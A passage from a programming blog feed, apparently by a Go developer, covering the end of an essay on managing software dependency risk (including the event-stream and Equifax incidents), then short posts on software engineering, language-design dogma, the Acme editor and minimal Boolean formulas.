AGPL-like licenses (too onerous) as well as WTFPL-like licenses (too vague).<sup class=footnote><a class=footnote id=fnref-13 href='#fn-13'>13</a></sup>
<a class=anchor href="#dependencies"><h3 id="dependencies">Dependencies</h3></a>
<p>
Does the code have dependencies of its own?
Flaws in indirect dependencies are just as bad for your program
as flaws in direct dependencies.
Dependency managers can list all the transitive dependencies
of a given package, and each of them should ideally be inspected as
described in this section.
A package with many dependencies incurs additional inspection work,
because those same dependencies incur additional risk
that needs to be evaluated.
<p>
Many developers have never looked at the full list of transitive
dependencies of their code and don’t know what they depend on.
For example, in March 2016 the NPM user community discovered
that many popular projects—including Babel, Ember, and React—all depended
indirectly on a tiny package called <code>left-pad</code>,
consisting of a single 8-line function body.
They discovered this when
the author of <code>left-pad</code> deleted that package from NPM,
inadvertently breaking most Node.js users’ builds.<sup class=footnote><a class=footnote id=fnref-14 href='#fn-14'>14</a></sup>
And <code>left-pad</code> is hardly exceptional in this regard.
For example, 30% of the
750,000 packages published on NPM
depend—at least indirectly—on <code>escape-string-regexp</code>.
Adapting Leslie Lamport’s observation about distributed systems,
a dependency manager can easily
create a situation in which the failure of a package you didn’t
even know existed can render your own code unusable.
<a class=anchor href="#test_the_dependency"><h2 id="test_the_dependency">Test the dependency</h2></a>
<p>
The inspection process should include running a package’s own tests.
If the package passes the inspection and you decide to make your
project depend on it,
the next step should be to write new tests focused on the functionality
needed by your application.
These tests often start out as short standalone programs
written to make sure you can understand the package’s API
and that it does what you think it does.
(If you can’t or it doesn’t, turn back now!)
It is worth then taking the extra effort to turn those programs
into automated tests that can be run against newer versions of the package.
If you find a bug and have a potential fix,
you’ll want to be able to rerun these project-specific tests
easily, to make sure that the fix did not break anything else.
<p>
It is especially worth exercising the likely problem areas
identified by the
basic inspection.
For Code Search, we knew from past experience
that PCRE sometimes took
a long time to execute certain regular expression searches.
Our initial plan was to have separate thread pools for
“simple” and “complicated” regular expression searches.
One of the first tests we ran was a benchmark,
comparing <code>pcregrep</code> with a few other <code>grep</code> implementations.
When we found that, for one basic test case,
<code>pcregrep</code> was 70X slower than the
fastest <code>grep</code> available,
we started to rethink our plan to use PCRE.
Even though we eventually dropped PCRE entirely,
that benchmark remains in our code base today.
<a class=anchor href="#abstract_the_dependency"><h2 id="abstract_the_dependency">Abstract the dependency</h2></a>
<p>
Depending on a package is a decision that you are likely to
revisit later.
Perhaps updates will take the package in a new direction.
Perhaps serious security problems will be found.
Perhaps a better option will come along.
For all these reasons, it is worth the effort
to make it easy to migrate your project to a new dependency.
<p>
If the package will be used from many places in your project’s source code,
migrating to a new dependency would require making
changes to all those different source locations.
Worse, if the package will be exposed in your own project’s API,
migrating to a new dependency would require making
changes in all the code calling your API,
which you might not control.
To avoid these costs, it makes sense to
define an interface of your own,
along with a thin wrapper implementing that
interface using the dependency.
Note that the wrapper should include only
what your project needs from the dependency,
not everything the dependency offers.
Ideally, that allows you to
substitute a different, equally appropriate dependency later,
by changing only the wrapper.
Migrating your per-project tests to use the new interface
tests the interface and wrapper implementation
and also makes it easy to test any potential replacements
for the dependency.
<p>
For Code Search, we developed an abstract <code>Regexp</code> class
that defined the interface Code Search needed from any
regular expression engine.
Then we wrote a thin wrapper around PCRE
implementing that interface.
The indirection made it easy to test alternate libraries,
and it kept us from accidentally introducing knowledge
of PCRE internals into the rest of the source tree.
That in turn ensured that it would be easy to switch
to a different dependency if needed.
<a class=anchor href="#isolate_the_dependency"><h2 id="isolate_the_dependency">Isolate the dependency</h2></a>
<p>
It may also be appropriate to isolate a dependency
at run-time, to limit the possible damage caused by bugs in it.
For example, Google Chrome allows users to add dependencies—extension code—to the browser.
When Chrome launched in 2008, it introduced
the critical feature (now standard in all browsers)
of isolating each extension in a sandbox running in a separate
operating-system process.<sup class=footnote><a class=footnote id=fnref-15 href='#fn-15'>15</a></sup>
An exploitable bug in an badly-written extension
therefore did not automatically have access to the entire memory
of the browser itself
and could be stopped from making inappropriate system calls.<sup class=footnote><a class=footnote id=fnref-16 href='#fn-16'>16</a></sup>
For Code Search, until we dropped PCRE entirely,
our plan was to isolate at least the PCRE parser
in a similar sandbox.
Today,
another option would be a lightweight hypervisor-based sandbox
like gVisor.<sup class=footnote><a class=footnote id=fnref-17 href='#fn-17'>17</a></sup>
Isolating dependencies
reduces the associated risks of running that code.
<p>
Even with these examples and other off-the-shelf options,
run-time isolation of suspect code is still too difficult and rarely done.
True isolation would require a completely memory-safe language,
with no escape hatch into untyped code.
That’s challenging not just in entirely unsafe languages like C and C++
but also in languages that provide restricted unsafe operations,
like Java when including JNI, or like Go, Rust, and Swift
when including their “unsafe” features.
Even in a memory-safe language like JavaScript,
code often has access to far more than it needs.
In November 2018, the latest version of the NPM package <code>event-stream</code>,
which provided a functional streaming API for JavaScript events,
was discovered to contain obfuscated malicious code that had been
added two and a half months earlier.
The code, which harvested large Bitcoin wallets from users of the Copay mobile app,
was accessing system resources entirely unrelated to processing
event streams.<sup class=footnote><a class=footnote id=fnref-18 href='#fn-18'>18</a></sup>
One of many possible defenses to this kind of problem
would be to better restrict what dependencies can access.
<a class=anchor href="#avoid_the_dependency"><h2 id="avoid_the_dependency">Avoid the dependency</h2></a>
<p>
If a dependency seems too risky and you can’t find
a way to isolate it, the best answer may be to avoid it entirely,
or at least to avoid the parts you’ve identified as most problematic.
<p>
For example, as we better understood the risks and costs associated
with PCRE, our plan for Google Code Search evolved
from “use PCRE directly,” to “use PCRE but sandbox the parser,”
to “write a new regular expression parser but keep the PCRE execution engine,”
to “write a new parser and connect it to a different, more efficient open-source execution engine.”
Later we rewrote the execution engine as well,
so that no dependencies were left,
and we open-sourced the result: RE2.<sup class=footnote><a class=footnote id=fnref-19 href='#fn-19'>19</a></sup>
<p>
If you only need a
tiny fraction of a dependency,
it may be simplest to make a copy of what you need
(preserving appropriate copyright and other legal notices, of course).
You are taking on responsibility for fixing bugs, maintenance, and so on,
but you’re also completely isolated from the larger risks.
The Go developer community has a proverb about this:
“A little copying is better than a little dependency.”<sup class=footnote><a class=footnote id=fnref-20 href='#fn-20'>20</a></sup>
<a class=anchor href="#upgrade_the_dependency"><h2 id="upgrade_the_dependency">Upgrade the dependency</h2></a>
<p>
For a long time, the conventional wisdom about software was “if it ain’t broke, don’t fix it.”
Upgrading carries a chance of introducing new bugs;
without a corresponding reward—like a new feature you need—why take the risk?
This analysis ignores two costs.
The first is the cost of the eventual upgrade.
In software, the difficulty of making code changes does not scale linearly:
making ten small changes is less work and easier to get right
than making one equivalent large change.
The second is the cost of discovering already-fixed bugs the hard way.
Especially in a security context, where known bugs are actively exploited,
every day you wait is another day that attackers can break in.
<p>
For example, consider the year 2017 at Equifax, as recounted by executives
in detailed congressional testimony.<sup class=footnote><a class=footnote id=fnref-21 href='#fn-21'>21</a></sup>
On March 7, a new vulnerability in Apache Struts was disclosed, and a patched version was released.
On March 8, Equifax received a notice from US-CERT about the need to update
any uses of Apache Struts.
Equifax ran source code and network scans on March 9 and March 15, respectively;
neither scan turned up a particular group of public-facing web servers.
On May 13, attackers found the servers that Equifax’s security teams could not.
They used the Apache Struts vulnerability to breach Equifax’s network
and then steal detailed personal and financial information
about 148 million people
over the next two months.
Equifax finally noticed the breach on July 29
and publicly disclosed it on September 4.
By the end of September, Equifax’s CEO, CIO, and CSO had all resigned,
and a congressional investigation was underway.
<p>
Equifax’s experience drives home the point that
although dependency managers know the versions they are using at build time,
you need other arrangements to track that information
through your production deployment process.
For the Go language, we are experimenting with automatically
including a version manifest in every binary, so that deployment
processes can scan binaries for dependencies that need upgrading.
Go also makes that information available at run-time, so that
servers can consult databases of known bugs and self-report to
monitoring software when they are in need of upgrades.
<p>
Upgrading promptly is important, but upgrading means
adding new code to your project,
which should mean updating your evaluation of the risks
of using the dependency based on the new version.
As minimum, you’d want to skim the diffs showing the
changes being made from the current version to the
upgraded versions,
or at least read the release notes,
to identify the most likely areas of concern in the upgraded code.
If a lot of code is changing, so that the diffs are difficult to digest,
that is also information you can incorporate into your
risk assessment update.
<p>
You’ll also want to re-run the tests you’ve written
that are specific to your project,
to make sure the upgraded package is at least as suitable
for the project as the earlier version.
It also makes sense to re-run the package’s own tests.
If the package has its own dependencies,
it is entirely possible that your project’s configuration
uses different versions of those dependencies
(either older or newer ones) than the package’s authors use.
Running the package’s own tests can quickly identify problems
specific to your configuration.
<p>
Again, upgrades should not be completely automatic.
You need to verify that the upgraded versions are appropriate for
your environment before deploying them.<sup class=footnote><a class=footnote id=fnref-22 href='#fn-22'>22</a></sup>
<p>
If your upgrade process includes re-running the
integration and qualification tests you’ve already written for the dependency,
so that you are likely to identify new problems before they reach production,
then, in most cases, delaying an upgrade is riskier than upgrading quickly.
<p>
The window for security-critical upgrades is especially short.
In the aftermath of the Equifax breach, forensic security teams found
evidence that attackers (perhaps different ones)
had successfully exploited the Apache Struts
vulnerability on the affected servers on March 10, only three days
after it was publicly disclosed, but they’d only run a single <code>whoami</code> command.
<a class=anchor href="#watch_your_dependencies"><h2 id="watch_your_dependencies">Watch your dependencies</h2></a>
<p>
Even after all that work, you’re not done tending your dependencies.
It’s important to continue to monitor them and perhaps even
re-evaluate your decision to use them.
<p>
First, make sure that you keep using the
specific package versions you think you are.
Most dependency managers now make it easy or even automatic
to record the cryptographic hash of the expected source code
for a given package version
and then to check that hash when re-downloading the package
on another computer or in a test environment.
This ensures that your build use
the same dependency source code you inspected and tested.
These kinds of checks
prevented the <code>event-stream</code> attacker,
described earlier, from silently inserting
malicious code in the already-released version 3.3.5.
Instead, the attacker had to create a new version, 3.3.6,
and wait for people to upgrade (without looking closely at the changes).
<p>
It is also important to watch for new indirect dependencies creeping in:
upgrades can easily introduce new packages
upon which the success of your project now depends.
They deserve your attention as well.
In the case of <code>event-stream</code>, the malicious code was
hidden in a different package, <code>flatmap-stream</code>,
which the new <code>event-stream</code> release added as a
new dependency.
<p>
Creeping dependencies can also affect the size of your project.
During the development of Google’s Sawzall<sup class=footnote><a class=footnote id=fnref-23 href='#fn-23'>23</a></sup>—a JIT’ed
logs processing language—the authors discovered at various times that
the main interpreter binary contained not just Sawzall’s JIT
but also (unused) PostScript, Python, and JavaScript interpreters.
Each time, the culprit turned out to be unused dependencies
declared by some library Sawzall did depend on,
combined with the fact that Google’s build system
eliminated any manual effort needed to start using a new dependency..
This kind of error is the reason that the Go language
makes importing an unused package a compile-time error.
<p>
Upgrading is a natural time to revisit the decision to use a dependency that’s changing.
It’s also important to periodically revisit any dependency that <i>isn’t</i> changing.
Does it seem plausible that there are no security problems or other bugs to fix?
Has the project been abandoned?
Maybe it’s time to start planning to replace that dependency.
<p>
It’s also important to recheck the security history of each dependency.
For example, Apache Struts disclosed different major remote code execution
vulnerabilities in 2016, 2017, and 2018.
Even if you have a list of all the servers that run it and
update them promptly, that track record might make you rethink using it at all.
<a class=anchor href="#conclusion"><h2 id="conclusion">Conclusion</h2></a>
<p>
Software reuse is finally here,
and I don’t mean to understate its benefits:
it has brought an enormously positive transformation
for software developers.
Even so, we’ve accepted this transformation without
completely thinking through the potential consequences.
The old reasons for trusting dependencies are becoming less valid
at exactly the same time we have more dependencies than ever.
<p>
The kind of critical examination of specific dependencies that
I outlined in this article is a significant amount of work
and remains the exception rather than the rule.
But I doubt there are any developers who actually
make the effort to do this for every possible new dependency.
I have only done a subset of them for a subset of my own dependencies.
Most of the time the entirety of the decision is “let’s see what happens.”
Too often, anything more than that seems like too much effort.
<p>
But the Copay and Equifax attacks are clear warnings of
real problems in the way we consume software dependencies today.
We should not ignore the warnings.
I offer three broad recommendations.
<ol>
<li>
<p>
<i>Recognize the problem.</i>
If nothing else, I hope this article has convinced
you that there is a problem here worth addressing.
We need many people to focus significant effort on solving it.
<li>
<p>
<i>Establish best practices for today.</i>
We need to establish best practices for managing dependencies
using what’s available today.
This means working out processes that evaluate, reduce, and track risk,
from the original adoption decision through to production use.
In fact, just as some engineers specialize in testing,
it may be that we need engineers who specialize in managing dependencies.
<li>
<p>
<i>Develop better dependency technology for tomorrow.</i>
Dependency managers have essentially eliminated the cost of
downloading and installing a dependency.
Future development effort should focus on reducing the cost of
the kind of evaluation and maintenance necessary to use
a dependency.
For example, package discovery sites might work to find
more ways to allow developers to share their findings.
Build tools should, at the least, make it easy to run a package’s own tests.
More aggressively,
build tools and package management systems could also work together
to allow package authors to test new changes against all public clients
of their APIs.
Languages should also provide easy ways to isolate a suspect package.</ol>
<p>
There’s a lot of good software out there.
Let’s work together to find out how to reuse it safely.
<p>
<a class=anchor href="#references"><h2 id="references">References</h2></a>
<ol class=fn>
<li id=fn-1>
Rachel Potvin and Josh Levenberg, “Why Google Stores Billions of Lines of Code in a Single Repository,” <i>Communications of the ACM</i> 59(7) (July 2016), pp. 78-87. <a href="https://doi.org/10.1145/2854146">https://doi.org/10.1145/2854146</a> <a class=fnref href='#fnref-1'>↩</a>
<li id=fn-2>
Russ Cox, “Go & Versioning,” February 2018. <a href="https://research.swtch.com/vgo">https://research.swtch.com/vgo</a> <a class=fnref href='#fnref-2'>↩</a>
<li id=fn-3>
Ken Thompson, “Reflections on Trusting Trust,” <i>Communications of the ACM</i> 27(8) (August 1984), pp. 761–763. <a href="https://doi.org/10.1145/358198.358210">https://doi.org/10.1145/358198.358210</a> <a class=fnref href='#fnref-3'>↩</a>
<li id=fn-4>
GNU Project, “GNU General Public License, version 1,” February 1989. <a href="https://www.gnu.org/licenses/old-licenses/gpl-1.0.html">https://www.gnu.org/licenses/old-licenses/gpl-1.0.html</a> <a class=fnref href='#fnref-4'>↩</a>
<li id=fn-5>
Titus Winters, “SD-8: Standard Library Compatibility,” C++ Standing Document, August 2018. <a href="https://isocpp.org/std/standing-documents/sd-8-standard-library-compatibility">https://isocpp.org/std/standing-documents/sd-8-standard-library-compatibility</a> <a class=fnref href='#fnref-5'>↩</a>
<li id=fn-6>
Go Project, “Go 1 and the Future of Go Programs,” September 2013. <a href="https://golang.org/doc/go1compat">https://golang.org/doc/go1compat</a> <a class=fnref href='#fnref-6'>↩</a>
<li id=fn-7>
Facebook, “Infer: A tool to detect bugs in Java and C/C++/Objective-C code before it ships.” <a href="https://fbinfer.com/">https://fbinfer.com/</a> <a class=fnref href='#fnref-7'>↩</a>
<li id=fn-8>
“SpotBugs: Find bugs in Java Programs.” <a href="https://spotbugs.github.io/">https://spotbugs.github.io/</a> <a class=fnref href='#fnref-8'>↩</a>
<li id=fn-9>
D. Richard Hipp, “How SQLite is Tested.” <a href="https://www.sqlite.org/testing.html">https://www.sqlite.org/testing.html</a> <a class=fnref href='#fnref-9'>↩</a>
<li id=fn-10>
Alexander Potapenko, “Testing Chromium: ThreadSanitizer v2, a next-gen data race detector,” April 2014. <a href="https://blog.chromium.org/2014/04/testing-chromium-threadsanitizer-v2.html">https://blog.chromium.org/2014/04/testing-chromium-threadsanitizer-v2.html</a> <a class=fnref href='#fnref-10'>↩</a>
<li id=fn-11>
NIST, “National Vulnerability Database – Search and Statistics.” <a href="https://nvd.nist.gov/vuln/search">https://nvd.nist.gov/vuln/search</a> <a class=fnref href='#fnref-11'>↩</a>
<li id=fn-12>
Russ Cox, “Regular Expression Matching with a Trigram Index, or How Google Code Search Worked,” January 2012. <a href="https://swtch.com/~rsc/regexp/regexp4.html">https://swtch.com/~rsc/regexp/regexp4.html</a> <a class=fnref href='#fnref-12'>↩</a>
<li id=fn-13>
Google, “Google Open Source: Using Third-Party Licenses.” <a href="https://opensource.google.com/docs/thirdparty/licenses/#banned">https://opensource.google.com/docs/thirdparty/licenses/#banned</a> <a class=fnref href='#fnref-13'>↩</a>
<li id=fn-14>
Nathan Willis, “A single Node of failure,” LWN, March 2016. <a href="https://lwn.net/Articles/681410/">https://lwn.net/Articles/681410/</a> <a class=fnref href='#fnref-14'>↩</a>
<li id=fn-15>
Charlie Reis, “Multi-process Architecture,” September 2008. <a href="https://blog.chromium.org/2008/09/multi-process-architecture.html">https://blog.chromium.org/2008/09/multi-process-architecture.html</a> <a class=fnref href='#fnref-15'>↩</a>
<li id=fn-16>
Adam Langley, “Chromium’s seccomp Sandbox,” August 2009. <a href="https://www.imperialviolet.org/2009/08/26/seccomp.html">https://www.imperialviolet.org/2009/08/26/seccomp.html</a> <a class=fnref href='#fnref-16'>↩</a>
<li id=fn-17>
Nicolas Lacasse, “Open-sourcing gVisor, a sandboxed container runtime,” May 2018. <a href="https://cloud.google.com/blog/products/gcp/open-sourcing-gvisor-a-sandboxed-container-runtime">https://cloud.google.com/blog/products/gcp/open-sourcing-gvisor-a-sandboxed-container-runtime</a> <a class=fnref href='#fnref-17'>↩</a>
<li id=fn-18>
Adam Baldwin, “Details about the event-stream incident,” November 2018. <a href="https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident">https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident</a> <a class=fnref href='#fnref-18'>↩</a>
<li id=fn-19>
Russ Cox, “RE2: a principled approach to regular expression matching,” March 2010. <a href="https://opensource.googleblog.com/2010/03/re2-principled-approach-to-regular.html">https://opensource.googleblog.com/2010/03/re2-principled-approach-to-regular.html</a> <a class=fnref href='#fnref-19'>↩</a>
<li id=fn-20>
Rob Pike, “Go Proverbs,” November 2015. <a href="https://go-proverbs.github.io/">https://go-proverbs.github.io/</a> <a class=fnref href='#fnref-20'>↩</a>
<li id=fn-21>
U.S. House of Representatives Committee on Oversight and Government Reform, “The Equifax Data Breach,” Majority Staff Report, 115th Congress, December 2018. <a href="https://republicans-oversight.house.gov/wp-content/uploads/2018/12/Equifax-Report.pdf">https://republicans-oversight.house.gov/wp-content/uploads/2018/12/Equifax-Report.pdf</a> <a class=fnref href='#fnref-21'>↩</a>
<li id=fn-22>
Russ Cox, “The Principles of Versioning in Go,” GopherCon Singapore, May 2018. <a href="https://www.youtube.com/watch?v=F8nrpe0XWRg">https://www.youtube.com/watch?v=F8nrpe0XWRg</a> <a class=fnref href='#fnref-22'>↩</a>
<li id=fn-23>
Rob Pike, Sean Dorward, Robert Griesemer, and Sean Quinlan, “Interpreting the Data: Parallel Analysis with Sawzall,” <i>Scientific Programming Journal</i>, vol. 13 (2005). <a href="https://doi.org/10.1155/2005/962135">https://doi.org/10.1155/2005/962135</a> <a class=fnref href='#fnref-23'>↩</a>
</ol>
<a class=anchor href="#coda"><h2 id="coda">Coda</h2></a>
<p>
A version of this post was published
in <a href="https://queue.acm.org/detail.cfm?id=3344149">ACM Queue</a>
(March-April 2019) and then <a href="https://dl.acm.org/doi/pdf/10.1145/3347446">Communications of the ACM</a>
(August 2019) under the title “Surviving Software Dependencies.”
What is Software Engineering?tag:research.swtch.com,2012:research.swtch.com/vgo-eng2018-05-30T10:00:00-04:002018-05-30T10:02:00-04:00What is software engineering and what does Go mean by it? (Go & Versioning, Part 9)
<p>
Nearly all of Go’s distinctive design decisions
were aimed at making software engineering simpler and easier.
We’ve said this often.
The canonical reference is Rob Pike’s 2012 article,
“<a href="https://talks.golang.org/2012/splash.article">Go at Google: Language Design in the Service of Software Engineering</a>.”
But what is software engineering?<blockquote>
<p>
<i>Software engineering is what happens to programming
<br>
when you add time and other programmers.</i></blockquote>
<p>
Programming means getting a program working.
You have a problem to solve, you write some Go code,
you run it, you get your answer, you’re done.
That’s programming,
and that’s difficult enough by itself.
But what if that code has to keep working, day after day?
What if five other programmers need to work on the code too?
Then you start to think about version control systems,
to track how the code changes over time
and to coordinate with the other programmers.
You add unit tests,
to make sure bugs you fix are not reintroduced over time,
not by you six months from now,
and not by that new team member who’s unfamiliar with the code.
You think about modularity and design patterns,
to divide the program into parts that team members
can work on mostly independently.
You use tools to help you find bugs earlier.
You look for ways to make programs as clear as possible,
so that bugs are less likely.
You make sure that small changes can be tested quickly,
even in large programs.
You’re doing all of this because your programming
has turned into software engineering.
<p>
(This definition and explanation of software engineering
is my riff on an original theme by my Google colleague Titus Winters,
whose preferred phrasing is “software engineering is programming integrated over time.”
It’s worth seven minutes of your time to see
<a href="https://www.youtube.com/watch?v=tISy7EJQPzI&t=8m17s">his presentation of this idea at CppCon 2017</a>,
from 8:17 to 15:00 in the video.)
<p>
As I said earlier,
nearly all of Go’s distinctive design decisions
have been motivated by concerns about software engineering,
by trying to accommodate time and other programmers
into the daily practice of programming.
<p>
For example, most people think that we format Go code with <code>gofmt</code>
to make code look nicer or to end debates among
team members about program layout.
But the <a href="https://groups.google.com/forum/#!msg/golang-nuts/HC2sDhrZW5Y/7iuKxdbLExkJ">most important reason for <code>gofmt</code></a>
is that if an algorithm defines how Go source code is formatted,
then programs, like <code>goimports</code> or <code>gorename</code> or <code>go</code> <code>fix</code>,
can edit the source code more easily,
without introducing spurious formatting changes when writing the code back.
This helps you maintain code over time.
<p>
As another example, Go import paths are URLs.
If code said <code>import</code> <code>"uuid"</code>,
you’d have to ask which <code>uuid</code> package.
Searching for <code>uuid</code> on <a href="https://godoc.org">godoc.org</a> turns up dozens of packages.
If instead the code says <code>import</code> <code>"github.com/pborman/uuid"</code>,
now it’s clear which package we mean.
Using URLs avoids ambiguity
and also reuses an existing mechanism for giving out names,
making it simpler and easier to coordinate with other programmers.
<p>
Continuing the example,
Go import paths are written in Go source files,
not in a separate build configuration file.
This makes Go source files self-contained,
which makes it easier to understand, modify, and copy them.
These decisions, and more, were all made with the goal of
simplifying software engineering.
<p>
In later posts I will talk specifically about why
versions are important for software engineering
and how software engineering concerns motivate
the design changes from dep to vgo.
Go and Dogmatag:research.swtch.com,2012:research.swtch.com/dogma2017-01-09T09:00:00-05:002017-01-09T09:02:00-05:00Programming language dogmatics.
<p>
[<i>Cross-posting from last year’s <a href="https://www.reddit.com/r/golang/comments/46bd5h/ama_we_are_the_go_contributors_ask_us_anything/d05yyde/?context=3&st=ixq5hjko&sh=7affd469">Go contributors AMA</a> on Reddit, because it’s still important to remember.</i>]
<p>
One of the perks of working on Go these past years has been the chance to have many great discussions with other language designers and implementers, for example about how well various design decisions worked out or the common problems of implementing what look like very different languages (for example both Go and Haskell need some kind of “green threads”, so there are more shared runtime challenges than you might expect). In one such conversation, when I was talking to a group of early Lisp hackers, one of them pointed out that these discussions are basically never dogmatic. Designers and implementers remember working through the good arguments on both sides of a particular decision, and they’re often eager to hear about someone else’s experience with what happens when you make that decision differently. Contrast that kind of discussion with the heated arguments or overly zealous statements you sometimes see from users of the same languages. There’s a real disconnect, possibly because the users don’t have the experience of weighing the arguments on both sides and don’t realize how easily a particular decision might have gone the other way.
<p>
Language design and implementation is engineering. We make decisions using evaluations of costs and benefits or, if we must, using predictions of those based on past experience. I think we have an important responsibility to explain both sides of a particular decision, to make clear that the arguments for an alternate decision are actually good ones that we weighed and balanced, and to avoid the suggestion that particular design decisions approach dogma. I hope <a href="https://www.reddit.com/r/golang/comments/46bd5h/ama_we_are_the_go_contributors_ask_us_anything/d05yyde/?context=3&st=ixq5hjko&sh=7affd469">the Reddit AMA</a> as well as discussion on <a href="https://groups.google.com/group/golang-nuts">golang-nuts</a> or <a href="http://stackoverflow.com/questions/tagged/go">StackOverflow</a> or the <a href="https://forum.golangbridge.org/">Go Forum</a> or at <a href="https://golang.org/wiki/Conferences">conferences</a> help with that.
<p>
But we need help from everyone. Remember that none of the decisions in Go are infallible; they’re just our best attempts at the time we made them, not wisdom received on stone tablets. If someone asks why Go does X instead of Y, please try to present the engineering reasons fairly, including for Y, and avoid argument solely by appeal to authority. It’s too easy to fall into the “well that’s just not how it’s done here” trap. And now that I know about and watch for that trap, I see it in nearly every technical community, although some more than others.
A Tour of Acmetag:research.swtch.com,2012:research.swtch.com/acme2012-09-17T11:00:00-04:002012-09-17T11:00:00-04:00A video introduction to Acme, the Plan 9 text editor
<p class="lp">
People I work with recognize my computer easily:
it's the one with nothing but yellow windows and blue bars on the screen.
That's the text editor acme, written by Rob Pike for Plan 9 in the early 1990s.
Acme focuses entirely on the idea of text as user interface.
It's difficult to explain acme without seeing it, though, so I've put together
a screencast explaining the basics of acme and showing a brief programming session.
Remember as you watch the video that the 854x480 screen is quite cramped.
Usually you'd run acme on a larger screen: even my MacBook Air has almost four times
as much screen real estate.
</p>
<center>
<div style="border: 1px solid black; width: 853px; height: 480px;"><iframe width="853" height="480" src="https://www.youtube.com/embed/dP1xVpMPn8M?rel=0" frameborder="0" allowfullscreen></iframe></div>
</center>
<p class=pp>
The video doesn't show everything acme can do, nor does it show all the ways you can use it.
Even small idioms like where you type text to be loaded or executed vary from user to user.
To learn more about acme, read Rob Pike's paper “<a href="/acme.pdf">Acme: A User Interface for Programmers</a>” and then try it.
</p>
<p class=pp>
Acme runs on most operating systems.
If you use <a href="https://9p.io/">Plan 9 from Bell Labs</a>, you already have it.
If you use FreeBSD, Linux, OS X, or most other Unix clones, you can get it as part of <a href="http://swtch.com/plan9port/">Plan 9 from User Space</a>.
If you use Windows, I suggest trying acme as packaged in <a href="http://code.google.com/p/acme-sac/">acme stand alone complex</a>, which is based on the Inferno programming environment.
</p>
<p class=lp><b>Mini-FAQ</b>:
<ul>
<li><i>Q. Can I use scalable fonts?</i> A. On the Mac, yes. If you run <code>acme -f /mnt/font/Monaco/16a/font</code> you get 16-point anti-aliased Monaco as your font, served via <a href="http://swtch.com/plan9port/man/man4/fontsrv.html">fontsrv</a>. If you'd like to add X11 support to fontsrv, I'd be happy to apply the patch.
<li><i>Q. Do I need X11 to build on the Mac?</i> A. No. The build will complain that it cannot build ‘snarfer’ but it should complete otherwise. You probably don't need snarfer.
</ul>
<p class=pp>
If you're interested in history, the predecessor to acme was called help. Rob Pike's paper “<a href="/help.pdf">A Minimalist Global User Interface</a>” describes it. See also “<a href="/sam.pdf">The Text Editor sam</a>”
</p>
<p class=pp>
<i>Correction</i>: the smiley program in the video was written by Ken Thompson.
I got it from Dennis Ritchie, the more meticulous archivist of the pair.
</p>
Minimal Boolean Formulastag:research.swtch.com,2012:research.swtch.com/boolean2011-05-18T00:00:00-04:002011-05-18T00:00:00-04:00Simplify equations with God
<p><style type="text/css">
p { line-height: 150%; }
blockquote { text-align: left; }
pre.alg { font-family: sans-serif; font-size: 100%; margin-left: 60px; }
td, th { padding-left; 5px; padding-right: 5px; vertical-align: top; }
#times td { text-align: right; }
table { padding-top: 1em; padding-bottom: 1em; }
#find td { text-align: center; }
</style>
<p class=lp>
<a href="http://oeis.org/A056287">28</a>.
That's the minimum number of AND or OR operators
you need in order to write any Boolean function of five variables.
<a href="http://alexhealy.net/">Alex Healy</a> and I computed that in April 2010. Until then,
I believe no one had ever known that little fact.
This post describes how we computed it
and how we almost got scooped by <a href="http://research.swtch.com/2011/01/knuth-volume-4a.html">Knuth's Volume 4A</a>
which considers the problem for AND, OR, and XOR.
</p>
<h3>A Naive Brute Force Approach</h3>
<p class=pp>
Any Boolean function of two variables
can be written with at most 3 AND or OR operators: the parity function
on two variables X XOR Y is (X AND Y') OR (X' AND Y), where X' denotes
“not X.” We can shorten the notation by writing AND and OR
like multiplication and addition: X XOR Y = X*Y' + X'*Y.
</p>
<p class=pp>
For three variables, parity is also a hardest function, requiring 9 operators:
X XOR Y XOR Z = (X*Z'+X'*Z+Y')*(X*Z+X'*Z'+Y).
</p>
<p class=pp>
For four variables, parity is still a hardest function, requiring 15 operators:
W XOR X XOR Y XOR Z = (X*Z'+X'*Z+W'*Y+W*Y')*(X*Z+X'*Z'+W*Y+W'*Y').
</p>
<p class=pp>
The sequence so far prompts a few questions. Is parity always a hardest function?
Does the minimum number of operators alternate between 2<sup>n</sup>−1 and 2<sup>n</sup>+1?
</p>
<p class=pp>
I computed these results in January 2001 after hearing
the problem from Neil Sloane, who suggested it as a variant
of a similar problem first studied by Claude Shannon.
</p>
<p class=pp>
The program I wrote to compute a(4) computes the minimum number of
operators for every Boolean function of n variables
in order to find the largest minimum over all functions.
There are 2<sup>4</sup> = 16 settings of four variables, and each function
can pick its own value for each setting, so there are 2<sup>16</sup> different
functions. To make matters worse, you build new functions
by taking pairs of old functions and joining them with AND or OR.
2<sup>16</sup> different functions means 2<sup>16</sup>·2<sup>16</sup> = 2<sup>32</sup> pairs of functions.
</p>
<p class=pp>
The program I wrote was a mangling of the Floyd-Warshall
all-pairs shortest paths algorithm. That algorithm is:
</p>
<pre class="indent alg">
// Floyd-Warshall all pairs shortest path
func compute():
for each node i
for each node j
dist[i][j] = direct distance, or ∞
for each node k
for each node i
for each node j
d = dist[i][k] + dist[k][j]
if d < dist[i][j]
dist[i][j] = d
return
</pre>
<p class=lp>
The algorithm begins with the distance table dist[i][j] set to
an actual distance if i is connected to j and infinity otherwise.
Then each round updates the table to account for paths
going through the node k: if it's shorter to go from i to k to j,
it saves that shorter distance in the table. The nodes are
numbered from 0 to n, so the variables i, j, k are simply integers.
Because there are only n nodes, we know we'll be done after
the outer loop finishes.
</p>
<p class=pp>
The program I wrote to find minimum Boolean formula sizes is
an adaptation, substituting formula sizes for distance.
</p>
<pre class="indent alg">
// Algorithm 1
func compute()
for each function f
size[f] = ∞
for each single variable function f = v
size[f] = 0
loop
changed = false
for each function f
for each function g
d = size[f] + 1 + size[g]
if d < size[f OR g]
size[f OR g] = d
changed = true
if d < size[f AND g]
size[f AND g] = d
changed = true
if not changed
return
</pre>
<p class=lp>
Algorithm 1 runs the same kind of iterative update loop as the Floyd-Warshall algorithm,
but it isn't as obvious when you can stop, because you don't
know the maximum formula size beforehand.
So it runs until a round doesn't find any new functions to make,
iterating until it finds a fixed point.
</p>
<p class=pp>
The pseudocode above glosses over some details, such as
the fact that the per-function loops can iterate over a
queue of functions known to have finite size, so that each
loop omits the functions that aren't
yet known. That's only a constant factor improvement,
but it's a useful one.
</p>
<p class=pp>
Another important detail missing above
is the representation of functions. The most convenient
representation is a binary truth table.
For example,
if we are computing the complexity of two-variable functions,
there are four possible inputs, which we can number as follows.
</p>
<center>
<table>
<tr><th>X <th>Y <th>Value
